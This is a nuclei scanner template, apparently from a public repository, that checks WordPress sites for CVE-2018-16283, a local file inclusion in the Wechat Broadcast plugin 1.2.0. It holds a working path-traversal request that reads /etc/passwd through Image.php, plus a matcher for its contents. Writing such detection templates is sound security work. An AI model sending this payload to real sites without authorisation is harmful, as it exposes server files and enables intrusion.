nuclei-templates/cves/2018/CVE-2018-16283.yaml

22 lines
558 B
YAML

id: CVE-2018-16283
info:
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
author: 0x240x23elu
severity: critical
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- https://www.exploit-db.com/exploits/45438
tags: cve,cve2018,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body